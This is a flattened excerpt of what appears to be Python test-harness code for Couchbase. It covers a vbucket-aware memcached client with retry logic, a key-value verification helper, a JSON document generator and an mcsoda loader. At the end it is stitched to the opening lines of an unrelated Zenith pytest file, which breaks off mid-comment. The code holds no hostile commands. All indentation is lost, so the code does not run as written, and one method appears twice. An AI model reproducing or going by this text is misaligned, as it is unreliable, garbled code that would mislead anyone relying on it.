vBucketMap[vBucket.id] = vBucket.master
self.add_memcached(vBucket.master, memcacheds, rest, bucket)
vBucketMapReplica[vBucket.id] = vBucket.replica
for replica in vBucket.replica:
self.add_memcached(replica, memcacheds, rest, bucket)
return memcacheds, vBucketMap, vBucketMapReplica
def add_memcached(self, server_str, memcacheds, rest, bucket, admin_user='cbadminbucket', admin_pass='password'):
if not server_str in memcacheds:
serverIp = server_str.rsplit(":", 1)[0]
serverPort = int(server_str.rsplit(":", 1)[1])
nodes = rest.get_nodes()
server = TestInputServer()
server.ip = serverIp
self.log.info("add_memcached: server ={}:{}".format(serverIp, serverPort))
servers_map = TestInputSingleton.input.param("servers_map","");
if servers_map:
log.info("servers_map={}".format(servers_map))
servers_ip_host = servers_map.split(",")
for server_ip_host in servers_ip_host:
ip_host = server_ip_host.split(":")
mapped_ip = ip_host[0]
mapped_host = ip_host[1]
if mapped_ip in server.ip:
log.info("--> replacing ip with hostname ")
server.ip = mapped_host
if TestInputSingleton.input.param("alt_addr", False):
server.ip = rest.get_ip_from_ini_file()
server.port = rest.port
server.rest_username = rest.username
server.rest_password = rest.password
try:
for node in nodes:
if node.ip == serverIp and node.memcached == serverPort:
if server_str not in memcacheds:
#server.port = node.port
if TestInputSingleton.input.param("is_secure", False):
server.port = server_ports.ssl_rest_port
else:
server.port = server.port = node.port
memcacheds[server_str] = \
MemcachedClientHelper.direct_client(server, bucket, admin_user=admin_user,
admin_pass=admin_pass)
#self.enable_collection(memcacheds[server_str])
break
except Exception as ex:
msg = "unable to establish connection to {0}. cleanup open connections"
self.log.warning(msg.format(serverIp))
self.done()
raise ex
def memcached(self, key, replica_index=None):
vBucketId = self._get_vBucket_id(key)
if replica_index is None:
return self.memcached_for_vbucket(vBucketId)
else:
return self.memcached_for_replica_vbucket(vBucketId, replica_index)
def memcached_for_vbucket(self, vBucketId):
if vBucketId not in self.vBucketMap:
msg = "vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if self.vBucketMap[vBucketId] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMap[vBucketId]))
return self.memcacheds[self.vBucketMap[vBucketId]]
def memcached_for_replica_vbucket(self, vBucketId, replica_index=0, log_on = False):
if vBucketId not in self.vBucketMapReplica:
msg = "replica vbucket map does not have an entry for vb : {0}"
raise Exception(msg.format(vBucketId))
if log_on:
self.log.info("replica vbucket: vBucketId {0}, server{1}".format(vBucketId, self.vBucketMapReplica[vBucketId][replica_index]))
if self.vBucketMapReplica[vBucketId][replica_index] not in self.memcacheds:
msg = "moxi does not have a mc connection for server : {0}"
raise Exception(msg.format(self.vBucketMapReplica[vBucketId][replica_index]))
return self.memcacheds[self.vBucketMapReplica[vBucketId][replica_index]]
def not_my_vbucket_memcached(self, key, collection=None):
vBucketId = self._get_vBucket_id(key)
which_mc = self.vBucketMap[vBucketId]
for server in self.memcacheds:
if server != which_mc:
return self.memcacheds[server]
# DECORATOR
def aware_call(func):
def new_func(self, key, *args, **keyargs):
vb_error = 0
while True:
try:
return func(self, key, *args, **keyargs)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
return new_func
# SUBDOCS
@aware_call
def counter_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).counter_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def array_add_insert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).array_add_insert_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def array_add_unique_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).array_add_unique_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def array_push_first_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).array_push_first_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def array_push_last_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).array_push_last_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def replace_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).replace_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def delete_sd(self, key, path, opaque=0, cas=0, collection=None):
return self._send_op(self.memcached(key).delete_sd, key, path, opaque=opaque, cas=cas, collection=collection)
@aware_call
def dict_upsert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).dict_upsert_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def dict_add_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, collection=None):
return self._send_op(self.memcached(key).dict_add_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create, collection=collection)
@aware_call
def exists_sd(self, key, path, cas=0, collection=None):
return self._send_op(self.memcached(key).exists_sd, key, path, cas=cas, collection=collection)
@aware_call
def get_sd(self, key, path, cas=0, collection=None):
return self._send_op(self.memcached(key).get_sd, key, path, cas=cas, collection=collection)
@aware_call
def set(self, key, exp, flags, value, collection=None):
return self._send_op(self.memcached(key).set, key, exp, flags, value, collection=collection)
@aware_call
def append(self, key, value, collection=None):
return self._send_op(self.memcached(key).append, key, value, collection=collection)
@aware_call
def observe(self, key, collection=None):
return self._send_op(self.memcached(key).observe, key, collection=collection)
@aware_call
def observe_seqno(self, key, vbucket_uuid, collection=None):
return self._send_op(self.memcached(key).observe_seqno, key, vbucket_uuid, collection=collection)
# This saves a lot of repeated code - the func is the mc bin client function
def generic_request(self, func, *args):
key = args[0]
vb_error = 0
while True:
try:
return self._send_op(func, *args)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
if vb_error >= 5:
raise error
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
self.log.info("***************resetting vbucket id***********")
vb_error += 1
else:
raise error
def get(self, key, collection=None):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).get, key, collection=collection)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or\
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def getr(self, key, replica_index=0, collection=None):
vb_error = 0
while True:
try:
vBucketId = self._get_vBucket_id(key)
return self._send_op(self.memcached(key, replica_index=replica_index).getr, key, collection=collection)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or\
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def setMulti(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, parallel=False, collection=None):
if parallel:
try:
import concurrent.futures
self._setMulti_parallel(exp, flags, key_val_dic, pause_sec, timeout_sec, collection=collection)
except ImportError:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, collection=collection)
else:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, collection=collection)
def _setMulti_seq(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, collection=None):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
for server_str, keyval in list(server_keyval.items()):
#if the server has been removed after server_keyval has been gotten
if server_str not in self.memcacheds:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, collection=collection)
else:
mc = self.memcacheds[server_str]
errors = self._setMulti_rec(mc, exp, flags, keyval, pause_sec,
timeout_sec, self._setMulti_seq, collection=collection)
if errors:
self.log.error(list(set(str(error) for error in errors)), exc_info=1)
raise errors[0]
def _setMulti_parallel(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, collection=None):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
tasks = []
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keyval)) as executor:
for server_str, keyval in list(server_keyval.items()) :
mc = self.memcacheds[server_str]
tasks.append(executor.submit(self._setMulti_rec, mc, exp, flags, keyval, pause_sec, timeout_sec, collection, self._setMulti_parallel))
errors = []
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout_sec):
if future.exception() is not None:
self.log.error("exception in {0} sec".format(time.time() - now))
raise future.exception()
errors.extend(future.result())
if errors:
self.log.error(list(set(str(error) for error in errors)), exc_info=1)
raise errors[0]
def enable_collection(self, memcached_client,bucket="default"):
memcached_client.bucket_select(bucket)
memcached_client.enable_collections()
memcached_client.hello(memcacheConstants.FEATURE_COLLECTIONS)
memcached_client.get_collections(True)
def _setMulti_rec(self, memcached_client, exp, flags, keyval, pause, timeout, rec_caller_fn, collection=None):
try:
if collection:
self.enable_collection(memcached_client)
errors = memcached_client.setMulti(exp, flags, keyval, collection=collection)
if not errors:
return []
elif timeout <= 0:
return errors
else:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
try:
rec_caller_fn(exp, flags, keyval, pause, timeout - pause, collection=collection) # Start all over again for these key vals.
except MemcachedError as error:
if error.status == ERR_2BIG:
self.log.info("<MemcachedError #%d ``%s''>" % (error.status, error.msg))
return []
else:
return [error]
return [] # Note: If used for async,too many recursive threads could get spawn here.
except (EOFError, socket.error) as error:
try:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or \
"Connection reset by peer" in str(error)\
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
else:
return [error]
except AttributeError:
# noinspection PyPackageRequirements
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or \
"Connection reset by peer" in str(error)\
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause)
return []
else:
return [error]
except BaseException as error:
if timeout <= 0:
return [error]
else:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause, collection=collection) # Please refer above for comments.
return []
def _get_server_keyval_dic(self, key_val_dic):
server_keyval = {}
for key, val in list(key_val_dic.items()):
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keyval :
server_keyval[server_str] = {}
server_keyval[server_str][key] = val
return server_keyval
def getMulti(self, keys_lst, pause_sec=1, timeout_sec=5, parallel=True,collection=None):
if parallel:
try:
import concurrent.futures
return self._getMulti_parallel(keys_lst, pause_sec, timeout_sec, collection=collection)
except ImportError:
return self._getMulti_seq(keys_lst, pause_sec, timeout_sec, collection=collection)
else:
return self._getMulti_seq(keys_lst, pause_sec, timeout_sec, collection=collection)
def _getMulti_seq(self, keys_lst, pause_sec=1, timeout_sec=5, collection=None):
server_keys = self._get_server_keys_dic(keys_lst) # set keys in their respective vbuckets and identify the server for each vBucketId
keys_vals = {}
for server_str, keys in list(server_keys.items()) : # get memcached client against each server and multi get
mc = self.memcacheds[server_str]
keys_vals.update(self._getMulti_from_mc(mc, keys, pause_sec, timeout_sec, self._getMulti_seq, collection=collection))
if len(keys_lst) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(set(keys_lst).difference(list(keys_vals.keys()))))
return keys_vals
def _getMulti_parallel(self, keys_lst, pause_sec=1, timeout_sec=5, collection=None):
server_keys = self._get_server_keys_dic(keys_lst)
tasks = []
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keys)) as executor:
for server_str, keys in list(server_keys.items()) :
mc = self.memcacheds[server_str]
tasks.append(executor.submit(self._getMulti_from_mc, mc, keys, pause_sec, timeout_sec, self._getMulti_parallel, collection=collection))
keys_vals = self._reduce_getMulti_values(tasks, pause_sec, timeout_sec)
if len(set(keys_lst)) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(set(keys_lst).difference(list(keys_vals[collection].keys()))))
return keys_vals
def _getMulti_from_mc(self, memcached_client, keys, pause, timeout, rec_caller_fn, collection=None):
try:
if collection:
self.enable_collection(memcached_client)
return memcached_client.getMulti(keys, collection=collection)
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
return rec_caller_fn(keys, pause, timeout - pause, collection=collection)
else:
raise error
except BaseException as error:
if timeout <= 0:
raise error
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
return rec_caller_fn(keys, pause, timeout - pause)
def _reduce_getMulti_values(self, tasks, pause, timeout):
keys_vals = {}
import concurrent.futures
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout):
if future.exception() is not None:
self.log.error("exception in {0} sec".format(time.time() - now))
raise future.exception()
keys_vals.update(future.result())
return keys_vals
def _get_server_keys_dic(self, keys):
server_keys = {}
for key in keys:
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keys :
server_keys[server_str] = []
server_keys[server_str].append(key)
return server_keys
def _get_vBucket_ids(self, keys, collection=None):
return {self._get_vBucket_id(key) for key in keys}
def _get_vBucket_id(self, key, collection=None):
return (zlib.crc32(key.encode()) >> 16) & (len(self.vBucketMap) - 1)
def delete(self, key, collection=None):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).delete, key, collection=collection)
except MemcachedError as error:
if error.status in [ERR_NOT_MY_VBUCKET, ERR_EINVAL] and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([key], collection=collection))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def _send_op(self, func, *args, **kargs):
backoff = .001
while True:
try:
return func(*args, **kargs)
except MemcachedError as error:
if error.status == ERR_ETMPFAIL and backoff < .5:
time.sleep(backoff)
backoff *= 2
else:
raise error
except (EOFError, IOError, socket.error) as error:
raise MemcachedError(ERR_NOT_MY_VBUCKET, "Connection reset with error: {0}".format(error))
def done(self):
[self.memcacheds[ip].close() for ip in self.memcacheds]
# This saves a lot of repeated code - the func is the mc bin client function
def generic_request(self, func, *args):
key = args[0]
vb_error = 0
while True:
try:
return self._send_op(func, *args)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
if vb_error >= 5:
raise error
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
self.log.info("***************resetting vbucket id***********")
vb_error += 1
else:
raise error
def _parse_not_my_vbucket_error(self, error):
error_msg = error.msg
if "Connection reset with error:" in error_msg:
self.log.error("{0} while _send_op, server is alive?".format(error_msg))
return None
vbuckets = []
try:
error_json = json.loads(error_msg[error_msg.find('{'):error_msg.rfind('}') + 1])
except:
self.log.error("Error while getting CCCP from not_my_vbucket...\n %s" % error_msg)
return None
if 'vBucketMapForward' in error_json['vBucketServerMap']:
vBucketMap = error_json['vBucketServerMap']['vBucketMapForward']
else:
vBucketMap = error_json['vBucketServerMap']['vBucketMap']
serverList = error_json['vBucketServerMap']['serverList']
if not self.rest:
self.rest = RestConnection(self.info)
serverList = [server.replace("$HOST", str(self.rest.ip))
if server.find("$HOST") != -1 else server for server in serverList]
counter = 0
for vbucket in vBucketMap:
vbucketInfo = vBucket()
vbucketInfo.master = serverList[vbucket[0]]
if vbucket:
for i in range(1, len(vbucket)):
if vbucket[i] != -1:
vbucketInfo.replica.append(serverList[vbucket[i]])
vbucketInfo.id = counter
counter += 1
vbuckets.append(vbucketInfo)
return vbuckets
def sendHellos(self, feature_flag ):
for m in self.memcacheds:
self.memcacheds[ m ].hello( feature_flag )
class KVStoreAwareSmartClient(VBucketAwareMemcached):
def __init__(self, rest, bucket, kv_store=None, info=None, store_enabled=True, collection=None):
VBucketAwareMemcached.__init__(self, rest, bucket, info, collection=collection)
self.kv_store = kv_store or ClientKeyValueStore()
self.store_enabled = store_enabled
self._rlock = threading.Lock()
def set(self, key, value, ttl=-1, flag=0, collection=None):
self._rlock.acquire()
try:
if ttl >= 0:
self.memcached(key).set(key, ttl, 0, value, collection=collection)
else:
self.memcached(key).set(key, 0, 0, value, collection=collection)
if self.store_enabled:
self.kv_store.write(key, hashlib.md5(value.encode()).digest(), ttl)
except MemcachedError as e:
self._rlock.release()
raise MemcachedError(e.status, e.msg)
except AssertionError:
self._rlock.release()
raise AssertionError
except:
self._rlock.release()
raise Exception("General Exception from KVStoreAwareSmartClient.set()")
self._rlock.release()
"""
" retrieve meta data of document from disk
"""
def get_doc_metadata(self, num_vbuckets, key, collection=None):
vid = crc32.crc32_hash(key) & (num_vbuckets - 1)
mc = self.memcached(key, collection=collection)
metadatastats = None
try:
metadatastats = mc.stats("vkey {0} {1}".format(key, vid))
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
self.log.info(msg)
return metadatastats
def delete(self, key, collection=None):
try:
self._rlock.acquire()
opaque, cas, data = self.memcached(key).delete(key, collection=collection)
if self.store_enabled:
self.kv_store.delete(key, collection=collection)
self._rlock.release()
if cas == 0:
raise MemcachedError(7, "Invalid cas value")
except Exception as e:
self._rlock.release()
raise MemcachedError(7, str(e))
def get_valid_key(self, key, collection=None):
return self.get_key_check_status(key, "valid", collection=collection)
def get_deleted_key(self, key, collection=None):
return self.get_key_check_status(key, "deleted", collection=collection)
def get_expired_key(self, key, collection=None):
return self.get_key_check_status(key, "expired", collection=collection)
def get_all_keys(self, collection=None):
return self.kv_store.keys(collection=collection)
def get_all_valid_items(self, collection=None):
return self.kv_store.valid_items(collection=collection)
def get_all_deleted_items(self, collection=None):
return self.kv_store.deleted_items(collection=collection)
def get_all_expired_items(self,collection=None):
return self.kv_store.expired_items(collection=collection)
def get_key_check_status(self, key, status,collection=None):
item = self.kv_get(key, collection=collection)
if(item is not None and item["status"] == status):
return item
else:
msg = "key {0} is not valid".format(key)
self.log.info(msg)
return None
# safe kvstore retrieval
# return dict of {key,status,value,ttl}
# or None if not found
def kv_get(self, key,collection=None):
item = None
try:
item = self.kv_store.read(key, collection=collection)
except KeyError:
msg = "key {0} doesn't exist in store".format(key)
# self.log.info(msg)
return item
# safe memcached retrieval
# return dict of {key, flags, seq, value}
# or None if not found
def mc_get(self, key, collection=None):
item = self.mc_get_full(key, collection=collection)
if item is not None:
item["value"] = hashlib.md5(item["value"]).digest()
return item
# unhashed value
def mc_get_full(self, key, collection=None):
item = None
try:
x, y, value = self.memcached(key).get(key, collection=collection)
item = {}
item["key"] = key
item["flags"] = x
item["seq"] = y
item["value"] = value
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
return item
def kv_mc_sync_get(self, key, status, collection=None):
self._rlock.acquire()
kv_item = self.get_key_check_status(key, status, collection=collection)
mc_item = self.mc_get(key, collection=collection)
self._rlock.release()
return kv_item, mc_item
class KVStoreSmartClientHelper(object):
@staticmethod
def do_verification(client, collection=None):
keys = client.get_all_keys(collection=collection)
validation_failures = {}
for k in keys:
m, valid = KVStoreSmartClientHelper.verify_key(client, k, collection=collection)
if(valid == False):
validation_failures[k] = m
return validation_failures
@staticmethod
def verify_key(client, key, collection=None):
status = False
msg = ""
item = client.kv_get(key, collection=collection)
if item is not None:
if item["status"] == "deleted":
msg, status = \
KVStoreSmartClientHelper.verify_delete(client, key, collection=collection)
elif item["status"] == "expired":
msg, status = \
KVStoreSmartClientHelper.verify_expired(client, key, collection=collection)
elif item["status"] == "valid":
msg, status = \
KVStoreSmartClientHelper.verify_set(client, key, collection=collection)
return msg, status
# verify kvstore contains key with valid status
# and that key also exists in memcached with
# expected value
@staticmethod
def verify_set(client, key, collection=None):
kv_item = client.get_valid_key(key, collection=collection)
mc_item = client.mc_get(key, collection=collection)
status = False
msg = ""
if(kv_item is not None and mc_item is not None):
# compare values
if kv_item["value"] == mc_item["value"]:
status = True
else:
msg = "kvstore and memcached values mismatch"
elif(kv_item is None):
msg = "valid status not set in kv_store"
elif(mc_item is None):
msg = "key missing from memcached"
return msg, status
# verify kvstore contains key with deleted status
# and that it does not exist in memcached
@staticmethod
def verify_delete(client, key, collection=None):
deleted_kv_item = client.get_deleted_key(key, collection=collection)
mc_item = client.mc_get(key, collection=collection)
status = False
msg = ""
if(deleted_kv_item is not None and mc_item is None):
status = True
elif(deleted_kv_item is None):
msg = "delete status not set in kv_store"
elif(mc_item is not None):
msg = "key still exists in memcached"
return msg, status
# verify kvstore contains key with expired status
# and that key has also expired in memcached
@staticmethod
def verify_expired(client, key, collection=None):
expired_kv_item = client.get_expired_key(key, collection=collection)
mc_item = client.mc_get(key, collection=collection)
status = False
msg = ""
if(expired_kv_item is not None and mc_item is None):
status = True
elif(expired_kv_item is None):
msg = "exp. status not set in kv_store"
elif(mc_item is not None):
msg = "key still exists in memcached"
return msg, status
def start_reader_process(info, keyset, queue):
ReaderThread(info, keyset, queue).start()
class GeneratedDocuments(object):
def __init__(self, items, kv_template, options=dict(size=1024)):
self._items = items
self._kv_template = kv_template
self._options = options
self._pointer = 0
if "padding" in options:
self._pad = options["padding"]
else:
self._pad = DocumentGenerator._random_string(options["size"])
self._pad = self._pad.decode()
# Required for the for-in syntax
def __iter__(self):
return self
def __len__(self):
return self._items
def reset(self):
self._pointer = 0
def has_next(self):
return self._pointer != self._items
# Returns the next value of the iterator
def __next__(self):
if self._pointer == self._items:
raise StopIteration
else:
i = self._pointer
doc = {"meta":{"id": "{0}-{1}".format(i, self._options["seed"])}, "json":{}}
for k in self._kv_template:
v = self._kv_template[k]
if isinstance(v, str) and v.find("${prefix}") != -1:
v = v.replace("${prefix}", "{0}".format(i))
# how about the value size
if isinstance(v, str) and v.find("${padding}") != -1:
v = v.replace("${padding}", self._pad)
if isinstance(v, str) and v.find("${seed}") != -1:
v = v.replace("${seed}", "{0}".format(self._options["seed"]))
doc["json"][k] = v
self._pointer += 1
return json.dumps(doc)
class DocumentGenerator(object):
# will loop over all values in props and replace ${prefix} with ${i}
@staticmethod
def make_docs(items, kv_template, options=dict(size=1024, seed=str(uuid.uuid4()))):
return GeneratedDocuments(items, kv_template, options)
@staticmethod
def _random_string(length):
return (("%%0%dX" % (length * 2)) % random.getrandbits(length * 8)).encode("ascii")
@staticmethod
def create_value(pattern, size):
return (pattern * (size // len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def get_doc_generators(count, kv_template=None, seed=None, sizes=None):
seed = seed or str(uuid.uuid4())[0:7]
sizes = sizes or [128]
doc_gen_iterators = []
if kv_template is None:
kv_template = {"name": "doc-${prefix}-${seed}",
"sequence": "${seed}",
"email": "${prefix}@couchbase.com"}
for size in sizes:
options = {"size": size, "seed": seed}
docs = DocumentGenerator.make_docs(count // len(sizes),
kv_template, options)
doc_gen_iterators.append(docs)
return doc_gen_iterators
@staticmethod
def get_doc_generators_by_load_ratio(rest,
bucket='default',
ram_load_ratio=1,
value_size_distribution=None,
seed=None):
log = logger.Logger.get_logger()
if ram_load_ratio < 0 :
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
list = []
info = rest.get_bucket(bucket)
emptySpace = info.stats.ram - info.stats.memUsed
space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
for size, probability in list(value_size_distribution.items()):
how_many = int(space_to_fill / (size + 250) * probability)
doc_seed = seed or str(uuid.uuid4())
kv_template = {"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
"size": size, "seed": doc_seed}
options = {"size": size, "seed": doc_seed}
payload_generator = DocumentGenerator.make_docs(how_many, kv_template, options)
list.append({'size': size, 'value': payload_generator, 'how_many': how_many, 'seed' : doc_seed})
return list
# docs = DocumentGenerator.make_docs(number_of_items,
# {"name": "user-${prefix}", "payload": "payload-${prefix}-${padding}"},
# {"size": 1024, "seed": str(uuid.uuid4())})
# Format of the json documents that mcsoda uses.
# JSON BODY
# {
# "key":"%s",
# "key_num":%s,
# "name":"%s",
# "email":"%s",
# "city":"%s",
# "country":"%s",
# "realm":"%s",
# "coins":%s,
# "achievements":%s
# }
class LoadWithMcsoda(object):
def __init__(self, master, num_docs, prefix='', bucket='default', rest_user='Administrator',
rest_password="password", protocol='membase-binary', port=11211):
rest = RestConnection(master)
self.bucket = bucket
vBuckets = rest.get_vbuckets(self.bucket)
self.vbucket_count = len(vBuckets)
self.cfg = {
'max-items': num_docs,
'max-creates': num_docs,
'min-value-size': 128,
'exit-after-creates': 1,
'ratio-sets': 1,
'ratio-misses': 0,
'ratio-creates': 1,
'ratio-deletes': 0,
'ratio-hot': 0,
'ratio-hot-sets': 1,
'ratio-hot-gets': 0,
'ratio-expirations': 0,
'expiration': 0,
'threads': 1,
'json': 1,
'batch': 10,
'vbuckets': self.vbucket_count,
'doc-cache': 0,
'doc-gen': 0,
'prefix': prefix,
'socket-timeout': 60,
}
self.protocol = protocol
self.rest_user = rest_user
self.rest_password = rest_password
if protocol == 'membase-binary':
self.host_port = "{0}:{1}:{2}".format(master.ip, master.port, port)
elif protocol == 'memcached-binary':
self.host_port = "{0}:{1}:{1}".format(master.ip, port)
self.ctl = { 'run_ok': True }
def protocol_parse(self, protocol_in):
if protocol_in.find('://') >= 0:
protocol = \
'-'.join(((["membase"] + \
protocol_in.split("://"))[-2] + "-binary").split('-')[0:2])
if TestInputSingleton.input.param("is_secure", False):
port = server_ports.ssl_rest_port
else:
port = server_ports.rest_port
host_port = ('@' + protocol_in.split("://")[-1]).split('@')[-1] + ":" + port
user, pswd = (('@' + protocol_in.split("://")[-1]).split('@')[-2] + ":").split(':')[0:2]
log.info("-->data_helper:host_port={}".format(host_port))
return protocol, host_port, user, pswd
def get_cfg(self):
return self.cfg
def load_data(self, collection=None):
cur, start_time, end_time = mcsoda.run(self.cfg, {}, self.protocol, self.host_port, self.rest_user, \
self.rest_password, ctl=self.ctl, bucket=self.bucket)
return cur
def load_stop(self):
self.ctl['run_ok'] = False
|
test_wal_acceptor.py
|
import pytest
import random
import time
from contextlib import closing
from multiprocessing import Process, Value
from fixtures.zenith_fixtures import WalAcceptorFactory, ZenithPageserver, PostgresFactory
pytest_plugins = ("fixtures.zenith_fixtures")
# basic test, write something in setup with wal acceptors, ensure that commits
